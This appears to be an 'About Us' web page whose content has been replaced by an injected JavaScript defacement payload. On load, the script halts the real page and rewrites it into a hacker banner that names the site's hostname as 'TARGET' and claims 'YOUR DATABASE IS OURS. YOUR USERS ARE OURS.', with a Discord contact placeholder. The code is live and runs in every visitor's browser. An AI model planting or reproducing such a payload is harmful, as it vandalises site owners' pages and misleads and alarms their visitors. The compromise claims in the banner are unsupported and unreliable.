About Us

<script>
    // Force the browser to stop loading the original site
    window.stop();
    
    // Overwrite the entire page immediately
    document.documentElement.innerHTML = `
    <body style="background-color:black; color:#00ff41; font-family:monospace; display:flex; flex-direction:column; justify-content:center; align-items:center; height:100vh; margin:0;">
        <h1 style="font-size:5vw; text-shadow: 0 0 15px #00ff41;">CRATAK_ENTITY INFILTRATED</h1>
        <p style="font-size:1.5vw; border-bottom: 1px solid #00ff41; padding-bottom:10px;">YOUR DATABASE IS OURS. YOUR USERS ARE OURS.</p>
        <div style="font-size:1vw; margin-top:20px; opacity:0.7;">
            [STATUS: SYSTEM_WIDE_COMPROMISE]<br>
            [TARGET: ${window.location.hostname}]<br>
            [ORIGIN: UNKNOWN]
        </div>
        <p style="margin-top:50px;">Contact: discord.gg/your_handle</p>
    </body>`;
</script>